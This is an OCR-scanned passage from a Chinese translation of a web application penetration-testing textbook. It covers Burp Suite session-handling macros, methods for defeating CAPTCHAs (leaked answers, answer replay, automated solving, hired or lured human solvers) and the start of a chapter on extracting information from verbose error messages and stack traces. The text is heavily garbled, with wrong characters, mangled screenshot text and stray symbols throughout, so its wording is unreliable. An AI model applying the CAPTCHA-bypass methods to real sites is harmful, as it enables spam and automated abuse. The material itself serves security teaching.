Selectthe items from the proxy history that you wish to include in the macro, and click "done” Note thatto record a macro now using your browser you = 二 
intercept is off 
will need to ensure that proxy interception is off. s 


Filter: showing all items 


到 匠 host method URL |params| mod | status | length |MIME type| extension i 
17 lhttpj/mdsec.net GET {auth/4/ 四 493 HTML Object moved 
18 Ihttps:/mdsecnet GET jiauth/4/Defaultashx 1477 “|HTML |ashx Login 


20 ”httpsJmdsecnet |POST _ |/auth/4/Default.ashx | 如 | 加 | 


己 




















图 
回回 





<1 ihttps://mdsecni _jSE1 Uini4Pome-asnx_ = | ‘IeW 

httpsJWmdsecnet GET {auth/4/Admin.ashx 200 1254 
24 lhttpsJmdsecnet |GET |/auth/4/NewUser.ashx 200 |1987 IHTML 
25 lhttpsiimdsecnet IPOST lauth/4/NewUserStep2ashx | | [|20 |1220 IHTML 
4 eens 


国 | 国 





国 
回回 器 





加 

















request | response 


mnttp://Wwhw. w3. org/TR/xhtml1i/DTD/xhtmili-transitional.dtd"><html xmLlns="http://www.w3.org/A1999/7Xhtmln 
><head><title>Home page</title><style type="text/css">H3 { font-family: Verdana, Arial, Helvetica, sans-—serif; 
font-size: 1.0em; line-height: 1.0em; }hody { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 0.8em; 
}</style></head><body><table bgcolor="#COEDS8O" width="100$%"><tr><td><font face="Arial’" size="5">Enbsp ;Home 


page</font></td><td><img border="O0" src="/wahh.png”" width="l28"” height="74" align="right"></td></tr></table><table 
border="1" phgcolor="#000000" bordercolor="#000000" cellspacing="D" cellpadding="D"width="10D0$" 
style="border-collapse: collapse"><tr><td></td></tr></table><br/> 


|<imd align="absmiddle" src="home.png">Enbsp ;Logged in as: Administrator.<br><br><a href="Admin.ashx">Admin</a><br><a 
href="YourDetails.ashx">Your details</,a><br><a href="ChangePassword.ashx">Change password</a><br><a 
href="Logout .ashx">Logout</a><br></body></html> 


区 区 下 














图 14-11 在 Burp Suite 中 录制 请 求 宏 
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可 以 为 宏 中 的 每 个 项 目 配 置 以 下 设置 ， 如 图 14-12 所 示 : 

口 是 否 应 将 cookie 库 中 的 cookie 添 加 到 请 求 中 

口 是 否 应 将 在 啊 应 中 收 到 的 cookie 添 加 到 cookie 库 中 ; 

口 对 于 请 求 中 的 每 个 参数 ， 是 应 使 用 预 设 值 ， 还 是 使 用 宏 内 以 前 的 啊 应 获取 的 值 。 








仿 BN ee 
, Configure macro item 

POST requestto https://mdsec.net/auth/468/NewUserStep2.ashx 

Cookie handling 

上] add cookies received in responses to the session handling cookie jar 


区 use cookies from the session handling cookie jar in requests 


Parameter handiing 











: -一 
realname Use preset value bd testuser 














T 1 
USername Use presetvalue 2 |testuser 











Userrole USe presetvalue w|luser 
L 











password Use presetvalue w | letmeini1 














confirmpassword Use presetvalue wv ||lletmein1 























nonce derive from prior response ww||Iresponse 1 | = 
上 | 














Done 





图 14-12 ”为 宏 项 目 配 置 cookie 和 参数 处 理 方式 











在 某 些 多 阶段 过 程 以 及 应 用 程序 大 量 使 用 反 CSREF 令 牌 的 情况 下 ， 从 宏 内 以 前 的 响应 获取 参 
数值 的 功能 特别 有 用 。 在 定义 新 宏 时 ，Burp 会 通过 识别 某 些 参数 ， 尝 试 自动 查找 任何 此 类 关系 ， 
这 些 参数 的 值 可 以 从 以 前 的 啊 应 中 (表单 字段 值 、 重 定 癌 目标 、 链 接 中 的 查询 字符 串 ) 确定 。 

eUUU000 

用 于 定义 会 话 处 理 规则 的 工具 是 Burp Suite 的 主要 会 话 处 理 支 持 组 件 , 该 工具 使 用 cookie 库 和 
请 求 宏 来 克服 实施 目 动 化 的 特定 限制 。 

每 个 规则 由 范围 (规则 的 应 用 范围 ) 和 操作 (规则 执行 的 操作 ) 组 成 。 对 于 Burp 提 出 的 每 个 
出 站 请 求 ， 将 确定 哪些 定义 的 规则 在 请 求 的 应 用 范围 内 ， 并 按 顺 序 执行 所 有 规则 的 操作 。 

每 个 规则 的 范围 可 以 基于 所 人 处理 的 请 求 的 以 下 任何 或 全 部 特性 进行 定义 ， 如 图 14-13 所 示 : 

口 提出 请 求 的 Burp 工 具 ; 

口 请 求 的 URL; 

口 请 求 中 参数 的 名 称 。 

每 个 规则 可 以 执行 一 项 或 多 项 操作 ， 如 图 14-14 所 示 ， 包 括 : 

口 从 会 话 处 理 cookie 库 中 添加 cookie; 

口 设置 特定 的 cookie 或 参数 值 ; 

口 检查 当前 会 话 是 否 有 效 ， 并 根据 结果 执行 相应 的 子 操作 ; 
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口 运行 宏 ; 
口 提示 用 户 在 浏览 需 中 执行 会 话 恢复 。 





器 proxy (use with caution) 


URL scope 
Use the configuration below to control which URLs this rule applies to. 
O include all URLs 
O use suite scope |defined in targettab] 
全 Use custom score 
include in scope 


加 protocol host/IP range 
四 jhttps Amdsecune 谨 





图 14-13 ”配置 会 话 处 理 规则 的 范围 


idate session andlog back in ifnecessary 


Rule actions 


The actions below will be performed in sequence when this rule is applied to a request. 


Use cookies from the session handling cookie jar 

Seta specific cookie or parameter value 

Run a macro 

Prompt for in-browser session recovery 
Jvwrr | 





图 14-14 ”配置 会 话 处 理 规则 的 操作 


人 


所 有 这 些 操作 都 可 以 进行 灵活 配置 , 并 且 能 够 以 任意 方式 组 合 使 用 , 处理 几乎 全 部 会 话 处 理 
机 制 。 利 用 运行 宏 并 根据 结果 更 新 指定 cookie: 和 参数 值 的 功能 ， 渗 透 测试 员 可 以 在 注销 后 重新 登 
录 应 用 程序 。 利 用 指示 在 浏览 避 中 执行 会 话 恢 复 的 提示 , 渗透 测试 员 可 以 处 理 需 要 键入 物理 令 牌 
中 的 数字 或 破解 CAPTCHA 拼 图 的 登录 机 制 (将 在 下 一 节 介 绍 )。 

通过 使 用 不 同 范围 和 操作 创建 多 个 规则 , 可 以 定义 一 系列 Burp 将 应 用 于 不 同 URL 和 参数 的 行 
为 。 例 如 ,已 知 某 应 用 程序 经 常 终 止 响应 意外 请 求 的 会 话 ， 并 且 大 量 使 用 一 个 csrftoken 反 
CSRF 令 脾 。 如 果 要 测试 该 应 用 程序 ， 可 以 定义 以 下 规则， 如 图 14-15 所 示 。 

口 对 于 所 有 请 求 ， 从 Burp 的 cookie 库 中 添加 cookie。 

口 对 于 指向 应 用 程序 的 域 的 请 求 ， 验 证 应 用 程序 的 当前 会 话 是 否 仍 处 于 活动 状态 。 如 果 是 ， 

则 运行 宏 重 新 登录 到 该 应 用 程序 ， 并 使 用 生成 的 会 话 令 牌 更 新 cookie 库 。 

口 对 于 指 问 包含 __csrftoken 参 数 的 应 用 程序 的 请 求 ， 首 先 运行 宏 来 获取 有 效 的 

csrftoken 值 ， 然 后 在 提出 请 求 时 使 用 该 值 。 




















i intruder TYR window about 





target | proxy spider | scanner | intruder | repeater sequencer decoder | comparer [ options alerts 
connections | sessions | display “ ssl | misc 
session handling 


The rules below control how different to0ls handle sessions When performing HTTP requests. The 
rules that are in-scooe for each request will be applied in sequence. 





description too's 
Use cookies from Burp's cookie jar spider, scanner, irtruder andrep... 














Monitor the followinotools traffic to update the session handling cookie jar: 
proxy D scanner L repeater 


spider Dintruder 回 sequencer 


view cookie jar 





macros 


Amacrois aseguence of one or more requests. You can use macros within session handling 
rules to perform application login, obtaining requesttokens, etc. 





Ifetch landing page 
log in 





remove 
up 


























图 14-15 一 组 会 话 处 理 规则 ， 可 用 于 处 理应 用 程序 使 用 的 会 话 终 止 机 制 和 反 CSRF 令 有 牌 
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要 将 Burp 的 会 话 处 理 功能 应 用 于 实际 的 应 用 程序 , 通常 需要 进行 复杂 的 配置 ,并 且 易 于 出 错 。 
Burp 提 供 了 一 项 追踪 功能 ,可 用 于 解决 会 话 处 理 配 置 问题 。 此 功能 将 显示 Burp 对 某 个 请 求 应 用 会 
话 处 理 规 则 所 执行 的 所 有 步骤 ,以 便于 查看 Burp 到 底 如 何 更 新 和 提出 请 求 , 并 确定 配置 是 否 按 预 
期 方式 运行 。 会 话 处 理 追 踪 功 能 如 图 14-16 所 示 。 


20:13:06 24 May 201 https:/mdsec net/auth/4/NewUserStep2.ashx 


Mpoareg 上 ER In 和 ee from cookie jar 


上 er i Te session is valid 
| Running macro to validate session: fetch home page 
| Processing macro itemz httpsJ/mdsec.net/auth/4/Home.ashx 
Updated 1 coodie in macro requestfrom cookie jar 


| Added 1 cookie from macro response to cookie jar 
_| Session is invalid 
| Running macro: log in 
| Processing maco item: https:/imdsec.net/auth/4/Default.ashx 
LUpdated 1 cooxie in macro requestfrom cookie jar 


| Added1 cookie from macro response to cookie jar 
current request from cookie jar 
wh Ee pO OO 





Running macro: get csrftoken 
' Processing macro item: https://mdsec.net/auth/4/NewUser.ashx 
cookie in macro requestfrom cookiejar 


[Updated parameter nonce in currentrequest from final macro response 


‘Tequest | response 
[Taw | params | neaoers ] he 
POST -auth/ 4/NewUserstep2 .ashx HTTP/1.1 


Host: mdsec.net 
User-hdqent: Mozilla/S.0 IMacintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/:4.0.1 
=0D .8 


Lccept: text/html,application/xhtml+xml,application/xml;dq=0.9,*/*;do=0. 
Accept-Language: en-us,en;d=0.5 





Accept-Encoding: gzip, deflate 


Actcept-Charset: ISO-8859-1,utf-8;9q=0.7,*»;d=0.”? 
ists i | omatches| 





图 14-16 ”Burp 的 会 话 处 理 追 踪 功 能 ， 可 用 于 监控 和 调试 会 话 处 理 规 则 





对 测试 目标 应 用 程序 所 需 的 规则 和 安 进 行 配置 和 测试 后 , 渗透 测试 员 可 以 正 篆 继续 手动 和 目 
动 测试 ， 就 好 像 测试 限制 并 不 存在 一 样 。 


14.6.2 CAPTCHA 控 件 


CAPTCHA 控 件 用 于 防止 攻击 者 日 动 使 用 某 些 应 用 程序 功能 。 注 册 电 子 邮件 账户 和 发 表 博 客 
文革 之 类 的 功能 通常 使 用 此 类 控件 ， 以 减少 垃圾 信息 。 
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CAPTCHA 是 Completely Automated Public Turing test to tell Computers and Humans Apart ( 全 
目 动 区 分 人 类 和 计算 机 的 图 灵 测 试 ) 的 缩写 。 通常, 这些 测 试 采 用 一 个 包含 外 形 扭曲 的 单词 的 拼 
图 ， 用 户 必 须 读 取 并 在 提交 表单 的 字段 中 输入 该 单词 。 此 类 拼图 还 包括 识别 特定 的 动物 或 植物 、 
图 像 方 同等 。 

对 人 类 而 言 ， 解 决 CAPTCHA 拼 图 相当 容易 ， 但 对 计算 机 而 言 却 非常 困难 。 由 于 突破 这 些 控 
件 会 给 垃圾 邮件 发 送 者 市 来 经 济 利益 ， 因 而 相关 机 构 不 断 增加 CAPTCHA 拼 图 的 难度 ， 导 人 臻 人 类 
越 来 越 难以 读 取 这 些 拼图 ， 如 图 14-17 所 示 。 由 于 人 类 与 计算 机 解决 CAPTCHA 拼 图 的 能 力 相 当 ， 
因此 ,作为 针对 垃圾 邮件 的 一 项 防御 措施 ， 这些 拼图 可 能 会 逐渐 失效 ,并 可 能 会 被 废弃 。 它 们 还 
会 造成 当前 并 未 完全 解决 的 访问 性 问题 。 








Type the characters you see in the picture below 


maU 


图 14-17 一 个 CAPTCHA 拼 图 





CAPTCHA 拼 图 可 以 通过 各 种 方式 进行 破解 ， 仪 一 部 分 拼图 适用 于 执行 安全 测试 。 

1. 攻击 CAPTCHA 控 件 

要 了 解 如 何 避 开 CAPTCHA 控 件 ， 最 有 效 的 方法 是 了 解 此 类 拼图 如 何 被 传送 至 用 户 ， 以 及 应 用 
程序 如 何 处 理 用 户 的 答案 。 

令 人 惊奇 的 是 ， 有 大 量 CAPTCHA 控 件 以 文本 形式 向 用 户 披露 拼图 答案 。 披 露 答案 的 形式 包 








括 : 
口 拼图 图 像 通过 URL 加 载 ， 而 拼图 答案 却 为 该 UREL 的 参数 ， 或 将 图 像 名 设置 为 CAPTCHA 答 
案 ; 





D 拼图 答案 存储 在 隐藏 表单 字段 中 

D 拼图 答案 出 现在 HTML 注 释 或 其 他 位 置 ( 用 于 调试 目的 ) 

在 这 些 情况 下 , 攻击 者 可 以 通过 脚本 攻击 轻松 获取 包含 拼图 答案 的 响应 ,并 在 下 一 个 攻击 请 
求 中 提交 该 答案 。 


尝试 访问 
http://mdsec.net/feedback/12/ 


http://mdsec.net/feedback/24/ 
http://mdsec.net/feedback/31/ 














CAPTCHA 控 件 的 一 个 更 弟 见 的 省 洞 在 于 ， 攻 击 者 可 以 在 茶 次 手动 解决 拼图 ， 然 后 在 多 个 请 
求 中 重复 提交 其 答 条 。 正常 情况 下 ,每 个 拼图 应 仅 用 一 次 ， 应 用 程序 应 在 收 到 提交 的 管 案 后 废 莽 
该 拼图 。 如 果 不 这 样 做 , 攻击 者 就 可 以 一 次 性 以 正常 方式 解决 拼图 ,然后 使 用 其 答案 不 限 数 量 地 
目 动 提出 请 求 。 
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尝试 访问 


http://mdsec.net/feedback/39/ 


注解 ”一 些 应 用 程序 有 意 提供 破解 CAPTCHA 的 代码 路 径 ， 以 便于 某 些 授权 自动 进程 





使 用 。 通 常 ， 在 这 些 情 况 下 ， 无 须 提交 相关 参数 名 就 可 以 避 开 CAPTCHA。 


2. 自动 破解 CAPTCHA 拼 图 

理论 上 上， 计算 机 可 以 破解 大 多 数 CAPTCHA 拼 图 ; 实际 上 ， 许 多 主流 拼图 算法 都 以 这 种 方式 
被 破解 。 

对 于 包含 扭曲 单词 的 标准 拼图 ， 人 破解 拼图 的 过 程 如 下 : 

(1) 删除 图 像 噪声 ; 

(2) 将 图 像 分 割 成 单个 字母 ; 

(3) 识别 每 个 部 分 包含 的 字母 。 

采用 最 新 技术 ， 计 算 机 能 够 相当 有 将 地 删除 图 像 噪声 ， 并 识别 已 被 正确 分 割 的 字母 。 这 时 ， 
将 图 像 分 割 成 字母 是 最 重要 的 挑战 ， 特 别 是 在 字母 重 登 并 且 高 度 扭曲 的 情况 下 。 

对 于 可 以 轻松 分 割 成 字母 的 众 单 拼图 , 可 以 使 用 某 种 目 行 编写 的 代码 来 删除 图 像 噪声 ,并 将 
文本 传送 到 现 有 的 OCR (光学 文字 识别 ) 库 中 来 进行 识别 。 对 于 非常 难以 分 割 的 复杂 拼图 , 各 种 
研究 项 目 已 经 成 功 破 解 了 一 些 知 名 Web 应 用 程序 的 CAPTCHA 拼 图 。 

对 于 其 他 类 型 的 拼图 ， 则 需要 针对 拼图 图 像 的 特点 采用 不 同 的 方法 。 例 如， 对 于 要 求 识 别 动 
物 或 物体 方向 的 拼图 ， 则 需要 使 用 实时 图 像 数 据 库 ， 以 便于 在 多 个 拼图 中 重复 使 用 。 但是， 如 果 
这 个 数据 库 非常 小 , 攻击 者 就 可 以 通过 手动 破解 数据 库 中 的 拼图 来 达到 成 功 实施 攻击 的 目的 。 即 
使 为 了 使 每 一 幅 重 复 使 用 的 图 像 在 计算 机 看 来 会 有 所 不 同 , 应 用 程序 对 图 像 应 用 了 噪声 和 其 他 扭 
曲 , 但 攻击 者 通常 会 采用 模糊 图 像 散 列 和 彩色 百 方 图 比较 , 将 给 定 拼图 中 的 图 像 与 已 手动 破解 的 
图 像 进行 匹配 。 

Microsoft 的 Asirra 拼 图 使 用 一 个 包含 数 百 万 幅 猎 和 和 狗 图 像 的 数据 库 ， 这 些 图 像 来 日 现实 世界 
中 可 领养 的 宠物 目录 。 我 们 在 下 一 市 将 讲 到 ,在 庞大 的 经 济 利益 的 刺激 下 ， 即 使 这 样 的 数据 库 也 
可 能 会 被 攻击 者 快速 破解 。 

值得 注意 的 是 ， 在 所 有 这 些 情况 下 ， 要 有 效 破 解 CAPTCHA 探 件 ， 攻 击 者 并 不 需要 完全 准确 
地 破解 拼图 。 例 如 ， 即 使 某 个 攻击 仅 正 确 破解 了 10% 的 拼图 ， 但 该 攻击 仍然 能 够 非常 有 效 地 实施 
自动 安全 测试 ， 或 传送 垃圾 邮件 ( 视 具体 情况 而 定 )。 通 和 常 ， 与 手动 攻击 相 比 ， 即 使 自动 攻击 需 
要 提交 十 倍 以 上 的 请 求 ， 后 者 实施 起 来 仍然 更 加 快捷 和 轻松 。 


尝试 访问 


http://mdsec.net/feedback/8/ 
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3. 使 用 人 类 破解 者 
有 了 时， 需要 破解 大 量 CAPTCHA 拼 图 的 犯罪 分 子 会 采用 一 些 并 不 适用 于 执行 Web 应 用 程序 安 
全 测试 的 技巧 ， 如 下 所 示 。 

口 攻击 者 可 以 使 用 某 个 貌似 善意 的 Web 站 点 诱 使 人 类 CAPTCHA 代 理 破解 日 标 应 用 程序 传 
递 的 拼图 。 通 消 ， 攻 击 者 会 利用 竞赛 奖励 或 免费 访问 色情 内 容 来 吸引 用 户 。 用 户 填写 注 
册 表 单 后 , 将 会 看 到 一 个 从 目标 应 用 程序 实时 提取 的 CAPTCHA 拼 图 ,用 户 破解 该 拼图 后 ， 
攻击 者 会 将 其 提供 的 答案 提交 给 目标 应 用 程序 。 

口 攻击 者 可 以 向 发 展 中 国家 的 人 类 CAPTCHA 工 蜂 支 付费 用 ,由 后 者 破解 大 量 拼图 。 一些 公 
司 提供 这 种 服务 ， 每 破解 1000 个 拼图 付费 不 到 1 美元 。 
































14.7 ”小结 


攻击 一 个 Web 应 用 程序 所 需 执行 的 绝 大 多 数 任务 必须 根据 应 用 程序 的 行为 以 及 与 它 交 互 和 
控制 它 的 方法 来 确定 。 为 此 需要 经 党 进行 手动 操作 , 分 别提 交 专 门 设计 的 请 求 并 审查 应 用 程序 对 
这 些 请 求 的 啊 应 。 

从 概念 上 讲 , 我 们 在 本 章 中 摘 述 的 技 马 非常 简单 。 它 们 包括 利用 目 动 技巧 使 上 述 定制 任务 更 
加 轻松 、 快 捷 、 高 效 。 事实 上 ， 渗透 测 试 员 可 以 对 想 要 执行 的 任何 手动 操作 上 自动 化 : 使 用 计算 机 
的 处 理 能 力 与 可 徘 性 能 攻击 目标 程序 的 源 洞 与 弱点 。 

在 茶 些 情况 下 ， 在 直接 应 用 上 自动 化 技巧 时 ， 可 能 会 遇 到 各 种 障碍 。 但 是 ， 多 数 情 况 下 ， 这 些 
障碍 都 可 以 通过 优化 自动 化 工具 或 查找 应 用 程序 防御 机 制 中 的 缺陷 加 以 殉 服 。 

里 然 概念 上 非 肖 简单 ， 但 有 效 使 用 目 动 化 定制 攻击 仍然 需要 运用 经 验 、 拉 能 ， 并 发 挥 想 象 。 
有 各 种 工具 可 帮助 渗透 测试 员 实 施 攻 击 , 或 者 他 们 也 可 以 编写 日 己 的 工具 。 但 任何 工具 也 符 代 不 
了 人 类 的 智慧 ， 思 考 方式 的 不 同 是 真正 熟练 的 Web 应 用 程序 黑客 与 纯粹 爱好 者 之 间 的 最 大 区 别 。 
掌握 本 书 其 他 各 草 描 述 的 所 有 技巧 后 , 读者 应 该 回 过 头 来 温习 本 章 的 主题 ,练习 如 何 将 目 动 化 定 
制 攻击 方法 应 用 于 那些 技巧 中 。 



































14.8 ”问题 


欲 知 答案 ， 请 参考 http:/mdsec. net/wahh。 
(1) 指出 使 用 自动 技巧 在 应 用 程序 中 枚 举 标 识 符 时 用 到 的 3 个 标识 符 “ 触 点 ”。 
(2) 对 于 下 面 的 每 一 类 漏洞 ， 指 出 一 个 可 用 于 确定 该 源 洞 的 模糊 测试 学 符 串 : 
(a) SQL 注 入 
(b) OS 命令 注入 
(c) 路 径 裔 历 
(d) 脚本 文件 包含 
(3) 当 对 一 个 包含 各 种 不 同 参 数 的 请 求 进行 模糊 测试 时 ， 为 何 要 在 保持 其 他 参数 不 变 的 情况 
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下 轮流 针对 每 一 个 参数 进行 测试 ? 

(4) 假设 在 一 个 试图 对 登录 功能 实施 蛮 力 攻击 以 找到 其 他 账户 证 书 的 自动 攻击 中 ， 无 论 提 交 
的 是 有 效 证 书 还 是 无 效 证 书 , 应 用 程序 都 返回 一 个 指 癌 相同 URL 的 HTTP 重 定 回 。 在 这 种 情况 下 ， 
使 用 什么 方法 探查 “ 触 点 ”最 为 可 靠 ? 

(5) 当 使 用 自动 攻击 从 应 用 程序 中 获取 数据 时 ， 想 要 的 信息 常常 位 于 一 个 静态 字符 串 之 后 ， 
渗透 测试 员 可 以 轻易 惟 获 这 些 数据 。 例 如 : 

<input type="text”" name="LastName" value=" 

但 是 , 在 其 他 情况 下 发 现 事 实 并 非 如 此 , 需要 的 信息 之 前 的 数据 可 能 会 发 生变 化 。 这 时 该 如 
何 设计 一 个 自动 攻击 来 满足 需要 ? 





























利用 信息 泄露 





和 刀 生 4 章 介 绍 了 可 用 于 解析 目标 应 用 程序 并 初步 了 解 其 运行 机 制 的 各 种 技巧 , 包括 以 大 体 上 
不 会 对 应 用 程序 造成 危害 的 方法 与 其 交互 ， 将 应 用 程序 的 内 容 与 功能 进行 分 类 ， 判 定 
它 使 用 的 技术 并 确定 主要 的 攻击 面 。 

本 章 介 绍 如 何在 实际 攻击 的 应 用 程序 中 提取 出 更 多 信息 , 主要 包括 以 出 人 意料 和 恶意 的 方式 
与 应 用 程序 进行 交互 ， 利 用 应 用 程序 的 反 轴 行为 所 取出 有 价值 的 信息 。 如 采取 得 成 功 ， 攻 击 者 就 
可 以 通过 这 种 攻击 获取 用 户 证 书 之 类 的 敏感 数据 ， 次 入 了 解 菏 种 错误 条 件 并 据 此 调整 攻击 方 癌 ， 
或 者 发 现 应 用 程序 所 使 用 技术 的 更 多 细节 ， 同 时 解析 应 用 程序 的 内 部 结构 与 功能 。 


15.1 利用 错误 消息 


发 生意 外 事件 时 ， 许 多 Web 应 用 程序 返回 详尽 的 错误 消息 。 从 仅仅 披露 错误 类 型 的 向 单 内 置 
消息 到 汽 露 许多 应 用 程序 状态 细 六 的 详细 调试 信息 都 涵 关 在 错误 消息 中 。 

在 部 午 之 前 ， 大 多 数 应 用 程序 都 接受 了 各 种 可 用 性 测试 。 通常 ,这 种 测试 能 够 发 现在 正常 使 
用 应 用 程序 过 程 中 出 现 的 大 部 分 错误 条 件 。 因 此 , 一 般 情 况 下 ,应 用 程序 会 对 这 些 条 件 进 行 合理 
地 处 理 ， 而 不 会 癌 用 户 返 回 任何 技术 消息 。 但 是 ， 如 采 应 用 程序 正在 遭受 攻击 ,很 可 能 就 会 出 现 
各 种 各 样 的 错误 条 件 , 导致 应 用 程序 癌 用 户 返回 更 加 详细 的 信息 。 如 宁 出 现 极 不 平常 的 错误 条 件 ， 
即使 是 最 注重 安全 的 应 用 程序 ( 如 电子 银行 使 用 的 应 用 程序 )， 也 会 问 用 户 返回 非常 详细 的 调试 
消息 。 


15.1.1 错误 消息 脚本 


如 果 在 解释 型 Web 脚 本 语言 ( 如 VBScript ) 中 出 现 错误 ， 应 用 程序 通常 会 返回 一 条 简单 的 错 
误 消 息 ， 以 揭示 错误 的 本 质 ， 并 且 还 可 能 会 有 发 生 错 误 的 文件 的 行 号 。 例 如 : 


Microsoft VBScript runtime error 800a0009 







































































Subscript out of range: [number -1] 


/register.asp, line 821 
这 种 消 奶 中 并 不 包含 任何 与 应 用 程序 状态 或 被 处 理 的 数据 有 关 的 敏感 信息 。 但 是 , 渗透 测试 
员 可 以 利用 它 从 各 方面 缩小 攻击 范围 。 例 如 ， 当 为 探查 浓 见 的 漏洞 在 一 个 特殊 的 参数 中 插 和 人 各 种 
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AAA 会 已 人 、、 NN 

攻击 字符 串 时 ， 可 能 会 遇 到 以 下 消息 : 
Microsoft VBScript runtime error :800a000Q2: 
Type mismatch: ' [string: "*"]' 
/scripts/confirmOrder.asp, line 715 


这 条 消息 指出 , 修改 的 值 被 赋 给 了 一 个 数学 式 参 数 , 但 是 , 由 于 提交 的 输入 中 包含 非 数字 字 
从， 因而 不 能 赋 给 上 述 参 数 。 在 这 种 情况 下 ， 向 这 个 参数 提供 非 数 字 攻 击 字 符 串 可 能 达 不 到 任何 
日 的 ， 也 不 会 发 现 各 种 类 型 的 漏洞 ， 因 此 ， 最 好 选择 其 他 的 参数 。 

此 外 , 这 种 类 型 的 错误 消息 还 有 助 于 更 好 地 理解 服务 带 冰 应 用 程序 的 逻辑 。 因 为 消息 披露 了 
发 生 错 误 的 行 吕 ,所 以 能 够 确定 两 个 不 同 的 畸形 请 求 是 触发 同一 个 错误 ， 还 是 不 同 的 错误 。 通 过 
在 几 个 参数 中 提交 不 良 的 输入 并 确认 错误 发 生 的 位 置 ， 还 可 以 确定 应 用 程序 处 理 不 同 参 数 的 顺 
序 。 系 统 性 地 修改 不 同 的 参数 ， 渗 透 测 试 员 就 可 以 解析 出 服务 带 执 行 的 各 种 代码 路 径 。 




















15.1.2 ” 栈 追 踪 


大 多 数 Web 应 用 程序 用 比 人 简单 脚本 更 复 洒 、 但 仍然 在 一 种 托管 执行 环境 ( managed execution 
environment ) 下 运行 的 语言 编写 ， 例 如 ，Java、C# 和 Visual Basic. NET。 如 果 这 些 语言 中 出 现 无 
法 处 理 的 错误 ,浏览 各 往往 会 显示 完整 的 栈 妃 踪 。 

栈 追 踩 是 一 种 结构 化 的 错误 消息 。 它 首先 说 明 具 体 的 错误 , 接着 在 后 面 的 许多 行 中 描述 错误 
发 生 时 调用 栈 的 执行 状态 。 调 用 栈 的 首 行 显示 生成 错误 的 函数 , 第 二 行 显示 调用 前 一 个 函数 的 函 
数 ， 以 此 类 推 ， 直 到 显示 所 有 被 调用 的 函数 。 

下 面 是 一 个 由 ASPNET 应 用 程序 生成 的 栈 妃 踩 : 


[HttpException (0x80004005): Cannot use a leading .. to exit above the 
































top directory.] 
System.Web.Util.UrlPath.Reduce{(Sstring path}) +701 
System.Web.Util.UrlPpath.Combine(String basepath, String relative}+304 
System.Web.UI.Control.ResolveUrl (String relativeUrl) +143 
PBSApDP. StatFunc.Web.MemberAwarePage.Redirect {String url} +130 
PRSAPP. StatFunc.Web.MemberAwarePage.Process{) +201 





PBSAPP. StatFunc.Web.MemberAwarePage.OnLoad(EventArgs e) 
System.Web.UI.Control.LoadRecursive{} +35 
System.Web.UI.Page.ProcessRedquestMain{} +750 


Version Information: Microsoft .NET Framework Version:1.1.4322.2300; 
ASP.NET VerSslon:1.1.4322 .2300 


这 种 错误 消息 提供 大 量 有 用 的 信息 ， 可 带 助攻 击 者 优化 针对 应 用 程序 的 攻击 。 

口 通常 ， 它 会 说 明 错 误 发 生 的 准确 原因 。 攻 击 者 可 以 根据 这 些 信息 调整 输入 内 容 ， 避 开 错 
误 条 件 ， 从 而 继续 实施 攻击 。 

口 调用 栈 经 第 会 引用 应 用 程序 使 用 的 大 量 库 和 第 三 方 代码 组 件 。 可 以 查阅 这 些 组 件 的 文档 
资料 ， 了 解 它 们 的 预期 行为 与 假设 。 还 可 以 创建 这 些 组 件 的 本 地 应 用 ， 并 对 它 进行 测试 ， 
本 解 应 用 程序 如 何 处 理 出 人 意料 的 输入 ， 并 确定 洪 在 的 着 洞 。 
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口 调用 栈 中 包含 用 于 处 理 请 求 的 所 有 权 代 码 组 件 的 名 称 。 了 解 这 些 组 件 的 命名 方案 及 其 相 
互 天 系 有 助 于 推 汤 应 用 程序 的 内 部 结构 与 功能 

口 栈 奶 中 中 通常 包含 行 号 。 和 前 面 描述 的 简单 错 # 误 消 恩 脚 本 一 样 ， 可 以 利用 这 些 行 号 探查 
并 理解 每 个 应 用 程序 组 件 的 内 部 逻辑 。 

口 错误 消息 中 常 肖 包含 与 应 用 程序 及 其 运行 环境 有 关 的 其 他 信息 。 在 前 面 的 示例 中 ， 可 以 
确定 应 用 程序 i 的 ASPNET 平台 的 版 本 ， 因 此 就 可 以 研究 这 个 平台 ， 碍 找 任何 已 知 
或 新 出 现 的 独 筒 、 反 和 背 行 为 、 篆 见 的 配置 错误 等 。 























15.1.3 详尽 的 调试 消息 
一 些 应 用 程序 ， 0 县 ， ee 要 加 ee 这 些 消 

















i15agor2n2pw39p55lpszsb55 

SessionUser.Sessions AppP.FEStructure.Sessions 
SessionUser.Auth 1 

SessionUser.BranchID 103 
SessionUser.CompanylID 76 

SessionUser. BrokerRet RRadvO0 
SessionUser.UserID 229 

SessionUser.Training 0 

SessionUser.NetworkID 11 
SessionUser.BrandingPath FE 

LOYgINURL /Default/fedefault.aspx 

ReturnURL ../default/fedefault.aspx 
SessionUser.Key f7esOQaef8fada30f31f3aeal04cef26ed2ce2be50073c 
SessionClient.ID 306 

SessionClient.ReviewIiD 245 

UPriv.2100 

SessionUser.NetworkLevelUser 0 

UPriv.2200 


SessionUser.BranchLevelUser 0 














SessionDatabase fd219 .prod.wahh-bank.com 

详尽 的 调试 消息 中 通常 包含 以 下 信息 。 

口 可 通过 用 户 输入 操纵 的 关键 会 话 变量 值 。 

口 数据 库 等 后 端 组 件 的 主机 名 称 与 证 书 。 

口 服务 需 中 的 文件 与 目录 名 称 。 

口 般 入 在 有 意义 的 会 话 令 牌 中 的 信息 〈 请 参阅 第 7 草 了 解 相 关内 容 )。 

口 用 于 保护 通过 知 户 端 传送 的 数据 的 加 密 密 包 ( 请 参阅 第 5 章 了 解 相 关内 容 )。 

口 在 本 地 代码 组 件 中 出 现 的 异 稼 调试 信息 ， 包 括 CPU 寄 存 需 的 但 、 栈 的 内 容 、 加 载 的 DLL 
列表 及 其 基本 地 址 ( 请 参阅 第 16 章 了 解 相关 内 容 )。 
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如 打 在 实际 的 生产 代码 中 出 现 这 种 泄露 功能 的 错误 ， 那 么 应 用 程序 承 存 在 严重 的 安全 缺陷 。 
渗透 测试 员 应 该 对 它 进行 仔细 检查 , 确定 任何 可 用 于 扩大 攻击 范围 的 数据 , 并 且 可 以 通过 提交 专 
门 设计 的 输入 操纵 应 用 程序 的 状态 ， 控 制 其 获取 信息 的 情况 。 


15.1.4 服务 器 与 数据 库 消息 


不 仅 应 用 程序 自身 ， 数 据 库 、 邮 件 服务 器 或 SOAP 服 务 器 等 后 端 组 件 也 会 返回 详尽 的 错误 消 
